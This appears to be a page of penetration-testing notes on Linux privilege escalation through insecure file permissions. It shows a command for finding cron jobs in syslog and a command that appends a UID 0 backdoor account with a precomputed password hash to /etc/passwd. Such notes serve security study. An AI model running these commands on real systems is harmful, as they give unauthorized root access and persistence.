> For the complete documentation index, see [llms.txt](https://tamagosecurity.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://tamagosecurity.gitbook.io/notes/linux/linux-privilege-escalation/insecure-file-permissions.md).

# Insecure File Permissions

## Abusing Cron Jobs

look for executed cron jobs from log, and see if the file is writable

```bash
grep "CRON" /var/log/syslog
```

## Abusing Password Authentication

if we can write /etc/passwd we can replace the password or create new one with root permission

```bash
openssl passwd w00t

echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
```
